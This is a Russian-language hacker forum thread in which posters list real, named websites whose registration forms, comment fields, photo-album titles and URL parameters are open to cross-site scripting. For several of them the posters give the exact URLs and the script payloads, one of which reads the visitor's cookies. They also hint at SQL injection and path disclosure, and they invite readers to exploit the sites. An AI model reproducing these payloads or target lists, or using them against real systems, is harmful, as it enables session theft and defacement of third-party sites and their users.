www.33hochu.ru

Нашел вначале пассивную

Зарегался думаю может еще что есть интересненькое?

ГЫ, конечно есть, проходим несложную регистрацию, и в своем профайле создаем фотоальбом а в названии пишем наш код

например --></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>


можно так "><script>alert(document.cookie)</script>

еще можно раскрыть пути и пощупать на предмет (мусколь стопудова стоит) инжекции

http://www.33hochu.ru/antixy

вот что получилось ))
все, работает и в опере и в лисе

www.pcweek.ru

уязвимы комментарии

пример http://www.pcweek.ru/themes/detail.php?ID=109663&THEME_ID=0&SPHERE_ID=?add-comment

хытитипи ввв.stroyazbuka.com/web/registration.php

так вот. регестрируемся в каталоге. в поле регион можно внедрить свой код ))

так же есть и пассивная. (говорю тока о xss ))) есть и другие темы )

http://www.themobstergame.com/

/

Уязвима Регистрация
Ни одно поле не фильтруется

"><script>('XSS')</script>

хсс в модуле, после http://www.asapmachineco.com/index.php?module=ath&banner=> можно прописать любую команду... ну юзайте короче )))

ИдиВЖопу.ру

Уязвимы поля "текст под картинкой" и "над картинкой"
Пример:

(с) Лигендо...

Заводи ак создаем вакансию.

http://www.jobportal.com.ua/vacancy/499117.html

(портфолио разработчика http://www.globalweb.kiev.ua/portfolio/)

Kanalia.ru - сайт обо мне!
в каментах галлереи не фильтруеццо имя отправителя
http://kanalia.ru/gallery/

Сиськи!
http://hahaha.com.ua/file/54.html